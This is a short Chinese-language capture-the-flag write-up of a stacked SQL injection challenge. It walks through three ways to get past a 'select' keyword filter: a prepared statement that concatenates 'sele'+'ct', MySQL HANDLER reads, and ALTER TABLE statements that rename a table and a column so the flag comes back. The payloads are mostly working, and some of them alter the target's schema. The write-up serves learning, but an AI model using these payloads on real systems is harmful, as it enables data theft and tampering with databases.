方法一

=1 回显正常
=1’回显不正常,报sql语法错误
=1’ --+ 回显正常,说明有sql注入点,应该是字符型注入(# 不能用)
=1’ order by 3 --+ 回显失败,说明有2个注入点
=1’ union select 1,2 --+ 回显显示过滤语句:
在这里插入图片描述
=1’; show databases --+ 爆数据库名

=-1’; show tables --+ 绕过过滤,显示表下的列名
在这里插入图片描述
=1’;show columns from words --+ 尝试堆叠注入(多条语句)

nothing…
在这里插入图片描述

想要进一步拿到信息,只有想办法绕过select语句

这里需要用到 sql语句的预编译
https://blog.csdn.net/weixin_45694388/article/details/111871581

-1';set @sql = CONCAT('sele','ct * from `1919810931114514`;');prepare aaa from @sql;EXECUTE aaa;#

在这里插入图片描述
再次通过大小写绕过关键字prepare过滤

方法二:handler查询

mysql可以使用select查询表中的数据，也可使用handler语句，这条语句是一行一行的浏览一个表中的数据。
handler可以用于MyISAM和InnoDB表。
使用方法：
handler table_name open打开一张表
handler table_name read first读取第一行内容，
handler table_name read next依次获取其它行
最后一行执行之后再执行handel table_name read next会返回一个空的结果。

-1';handler `1919810931114514` open;handler `1919810931114514` read first;#

方法三他好骚啊

有如下列，其中有一个列就是data列我们是可以进行查询，爆出内容的，所以我们可以利用数据库修改表名和列名的方法，将我们要查询的表名改成第二个，就可以查询出我们想要的内容了

=1'; alter table words rename to aaaa;alter table `1919810931114514` rename to words;alter table words change flag id varchar(100);#

介绍一下这几句：
alter table words rename to aaaa;先把原来的words表名字改成别的，这个随便
alter table 1919810931114514 rename to words;将表1919810931114514的名字改为words
alter table words change flag id varchar(100);将改完名字后的表中的flag改为id，字符串尽量长点吧

然后我们用1’ or 1=1 --+直接就能得到正确结果
在这里插入图片描述